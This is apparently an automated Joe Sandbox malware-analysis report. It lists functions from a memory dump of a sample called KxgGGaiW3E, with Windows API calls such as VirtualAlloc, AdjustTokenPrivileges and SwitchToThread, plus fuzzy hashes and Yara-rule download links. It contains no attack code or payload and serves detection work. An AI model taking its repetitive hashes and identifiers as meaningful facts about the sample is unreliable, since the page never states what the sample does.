Instruction ID: a215fc13aba3a333c38f592b3e66648b2645d26d7c353dfdac75296ad4bb5d45
Opcode Fuzzy Hash: 26bb6d4feb826c89409c737ffddf6c17083ef5c9aa542e6c36a30effe3fcae81
Instruction Fuzzy Hash: 85312632B06B5182EA94EB16E90012AA3A5FF49FD0F848135DF5C27B85EF3CD462C354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703024970 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FF703024986
VirtualFree.KERNELBASE ref: 00007FF70302499C

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: cef73cd749a1f159d2755f311957df4b2b09bc7e22ac56227996b3c60add0337
Instruction ID: 3c07ff1c6864f35260d7a7813c6426ff34dd80a4c9edbd4a7eaaaa27ec8bb61f
Opcode Fuzzy Hash: cef73cd749a1f159d2755f311957df4b2b09bc7e22ac56227996b3c60add0337
Instruction Fuzzy Hash: 5FE0C238F1650186FB9CA713BC42A2592517F8EB00FC08438C40D12350DF2DE11B8B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703033AC2 Relevance: 1.7, APIs: 1, Instructions: 153threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF703033C1A

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 79200ba18748bbd7f51892528078a1cfb1b2c3be00565461ee14d738153b9e68
Instruction ID: 679cf2696265ec32cd871888eb200a3c51183909993a84648b0eb70d52d52b47
Opcode Fuzzy Hash: 79200ba18748bbd7f51892528078a1cfb1b2c3be00565461ee14d738153b9e68
Instruction Fuzzy Hash: D3616834E0B20386F6D1BB1AAED0775E69AAF05714F844179CA0D663E1DF3CB8858738

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7030294FE Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF703029544

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 585c5b0283a90edc90468c7499508650e9e86f0c92a5e4ea8080d39df2a08525
Instruction ID: 373f9072161edb04c6767f8557ae6c9502f2a86d9a661031c248ef29248af3c5
Opcode Fuzzy Hash: 585c5b0283a90edc90468c7499508650e9e86f0c92a5e4ea8080d39df2a08525
Instruction Fuzzy Hash: 5941D462F0AA5246F690AA11D8419B5A3A2FF84BA0F844235EE6D737C5CF3CE952C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703115180 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(?,?,?,?,00000010,?,?,?,?,?,?,?,00007FF7031150DE), ref: 00007FF7031151D2

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a6d5c86e64202f0eb83e28acb21147d4e68d51560377b954ed1e0c19f1170f57
Instruction ID: 87da9cdce3ef2352e23b7ad0d246ddd8c479b6959400de0f46d788d289333436
Opcode Fuzzy Hash: a6d5c86e64202f0eb83e28acb21147d4e68d51560377b954ed1e0c19f1170f57
Instruction Fuzzy Hash: 9321CF23E0E52685F7E1F762AC021FDD2626F99798F940035DD0D37786DF2CA8838260

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70301B590 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

EventRegister.ADVAPI32(?,?,?,00007FF7030156FF), ref: 00007FF70301B5E1

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: EventRegister
String ID:
API String ID: 3840811365-0
Opcode ID: 18c339118df192ad297b3813eab2b31c94cf903426b60caa6dee84bd45be11cf
Instruction ID: 84deb651912ba3ca9753ca9ede826279fa7f52ed1c88bd7621290d10da19f48b
Opcode Fuzzy Hash: 18c339118df192ad297b3813eab2b31c94cf903426b60caa6dee84bd45be11cf
Instruction Fuzzy Hash: 7F21C571A09A0792FB80BB25EC819B4F3A1AF44744FC0403AD92D67361EF3CA549C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703016180 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70301C7E0: GetCurrentThreadId.KERNEL32 ref: 00007FF70301C7E4

Part of subcall function 00007FF70301C3A0: VirtualQuery.KERNEL32 ref: 00007FF70301C3D2

RaiseFailFastException.KERNEL32 ref: 00007FF7030161F7

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
String ID:
API String ID: 2131581837-0
Opcode ID: 5530f064360d37136eda02febe4a1ac6cea05fa9d1a81b8b647b041ec2c41d9a
Instruction ID: ced61d58d193858921511b9de8178e5401174ce1e6c3a7af54c04d512d67111f
Opcode Fuzzy Hash: 5530f064360d37136eda02febe4a1ac6cea05fa9d1a81b8b647b041ec2c41d9a
Instruction Fuzzy Hash: B8016172B0A78292EB98FB61A9412EDF3A2FF45380F844039EB5D57746DF38E0248714

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF703024B00 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 00007FF703024B3C
GetCurrentProcess.KERNEL32 ref: 00007FF703024B64
OpenProcessToken.ADVAPI32 ref: 00007FF703024B77
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF703024B9C
GetLastError.KERNEL32 ref: 00007FF703024BA4
CloseHandle.KERNEL32 ref: 00007FF703024BB1
GetLargePageMinimum.KERNEL32 ref: 00007FF703024BC6
VirtualAlloc.KERNEL32 ref: 00007FF703024BF7
GetCurrentProcess.KERNEL32 ref: 00007FF703024C03
VirtualAllocExNuma.KERNEL32 ref: 00007FF703024C23

Strings

SeLockMemoryPrivilege, xrefs: 00007FF703024B35

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
String ID: SeLockMemoryPrivilege
API String ID: 1752251271-475654710
Opcode ID: 61d71791c1eda4276b3a464382d2158deee46f94b8299937d3729a612eb898ff
Instruction ID: ee06b0210e4226deb333d3b9dfaafb0591c501d25f02d00b8c288a7a8ce94d66
Opcode Fuzzy Hash: 61d71791c1eda4276b3a464382d2158deee46f94b8299937d3729a612eb898ff
Instruction Fuzzy Hash: A631C835A0DA4286F7A0AB61FC4477AE7A1EF49B84F904435E94E67754DF3CD0488720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70301A020 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF703119AF0,00007FF70313CD51), ref: 00007FF70301A08C
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF703119AF0,00007FF70313CD51), ref: 00007FF70301A1C8
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF703119AF0,00007FF70313CD51), ref: 00007FF70301A2A6
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF703119AF0,00007FF70313CD51), ref: 00007FF70301A2BC
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF703119AF0,00007FF70313CD51), ref: 00007FF70301A2FA

Strings

[ KeepUnwinding ], xrefs: 00007FF70301A2D0

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: [ KeepUnwinding ]
API String ID: 2546344036-400895726
Opcode ID: 92f8e0f5b20c6d3bf95bf9652954fb05ed00692a2bc346aa3c860580e567c973
Instruction ID: 1d8b55f0c1a166a3704c57b4420fd3ccac98c5da3fd52f79d731836d7c7d0916
Opcode Fuzzy Hash: 92f8e0f5b20c6d3bf95bf9652954fb05ed00692a2bc346aa3c860580e567c973
Instruction Fuzzy Hash: 3EA15032B0BB4286EBD5AF25D8502A9B3A2FF44B58F984136CE4D17798EF39D451C324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7030400D0 Relevance: 7.8, APIs: 5, Instructions: 335COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF7030402CB
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF70304030D
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF703040338
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF703040359
FlushProcessWriteBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF7030405C7

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: CriticalSection$EnterLeave$BuffersFlushProcessWrite
String ID:
API String ID: 2950773196-0
Opcode ID: 92d08aef4c78e77975bb366e55a40eb9a7b42dcb3587ae6cb8b0ffc01f37f988
Instruction ID: dffacadc0e8ce9004188f896a3d6c4841e0fcf95d84f0e3b2c6dcbc6a6ee69b9
Opcode Fuzzy Hash: 92d08aef4c78e77975bb366e55a40eb9a7b42dcb3587ae6cb8b0ffc01f37f988
Instruction Fuzzy Hash: 46E1A2B2A0A68681FAA0EB15FC81779E3A1FF44B90F844539CA4C677A5DF7CE144C324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70301C4C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,00000000,?,?,00007FF703016826), ref: 00007FF70301C4E3
GetProcAddress.KERNEL32(?,?,00000000,?,?,00007FF703016826), ref: 00007FF70301C4F8
GetEnabledXStateFeatures.KERNEL32(?,?,00000000,?,?,00007FF703016826), ref: 00007FF70301C505
InitializeContext.KERNEL32(?,?,00000000,?,?,00007FF703016826), ref: 00007FF70301C544
GetLastError.KERNEL32(?,?,00000000,?,?,00007FF703016826), ref: 00007FF70301C552
InitializeContext.KERNEL32(?,?,00000000,?,?,00007FF703016826), ref: 00007FF70301C5A6

Strings

kernel32.dll, xrefs: 00007FF70301C4DC
InitializeContext2, xrefs: 00007FF70301C4EE

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
String ID: InitializeContext2$kernel32.dll
API String ID: 4102459504-3117029998
Opcode ID: cac7cfce39b85bcbecad752f3349c4f6887585477b60e9341ca6886e06a75983
Instruction ID: 3d98d134afd2141ccbb4fe46cef3f77e4fce2becfd0dda680d82c41dde512af7
Opcode Fuzzy Hash: cac7cfce39b85bcbecad752f3349c4f6887585477b60e9341ca6886e06a75983
Instruction Fuzzy Hash: 1E318F35B09B4682FB81EB55FC40639E3A1AF84B94F840435D95D63BA8EF3CE486C724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70302F2D0 Relevance: 10.7, APIs: 7, Instructions: 227threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF70302F391
SwitchToThread.KERNEL32 ref: 00007FF70302F43A
SwitchToThread.KERNEL32 ref: 00007FF70302F443
SwitchToThread.KERNEL32 ref: 00007FF70302F57A
SwitchToThread.KERNEL32 ref: 00007FF70302F583
SwitchToThread.KERNEL32 ref: 00007FF70302F5AD

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 1516261b669741327130e79f501615528b5d68caf571dd79b0a6a8129b7f81fe
Instruction ID: cd7c76ea98ca76822729f07f7eff3177c2e958b14613851a662aff0274fc743e
Opcode Fuzzy Hash: 1516261b669741327130e79f501615528b5d68caf571dd79b0a6a8129b7f81fe
Instruction Fuzzy Hash: CCA15A30F0E11346F6E0BB25EC81E36E2A6AF007A5F944539E91DA66E1DF6CF4408738

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70303FD10 Relevance: 9.2, APIs: 6, Instructions: 184threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF70303FDDA
SwitchToThread.KERNEL32 ref: 00007FF70303FDE3
SwitchToThread.KERNEL32 ref: 00007FF70303FE0D
SwitchToThread.KERNEL32 ref: 00007FF70303FF2A
SwitchToThread.KERNEL32 ref: 00007FF70303FF33
SwitchToThread.KERNEL32 ref: 00007FF70303FF5D

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 8c57f4b4d45a047a892a188b0daee8a630f76c133edaef943d75e5617998dc8f
Instruction ID: f56f6ec1d091aa611e396e32a65d19fa8375fa9fa6158d83aba61972dfc250b2
Opcode Fuzzy Hash: 8c57f4b4d45a047a892a188b0daee8a630f76c133edaef943d75e5617998dc8f
Instruction Fuzzy Hash: 47816130F0E2034AF6D4BB259D90A36E2DAAF45751F844139ED5DA72D2DF2CF4418678

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703051230 Relevance: 9.2, APIs: 6, Instructions: 165COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(0000017BDE4E1018,?,?,00007FF703051E5D), ref: 00007FF7030512E0
DebugBreak.KERNEL32(0000017BDE4E1018,?,?,00007FF703051E5D), ref: 00007FF70305131D
DebugBreak.KERNEL32(0000017BDE4E1018,?,?,00007FF703051E5D), ref: 00007FF703051338
DebugBreak.KERNEL32(0000017BDE4E1018,?,?,00007FF703051E5D), ref: 00007FF7030513A3
DebugBreak.KERNEL32(0000017BDE4E1018,?,?,00007FF703051E5D), ref: 00007FF7030513BE
DebugBreak.KERNEL32(0000017BDE4E1018,?,?,00007FF703051E5D), ref: 00007FF70305142F

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

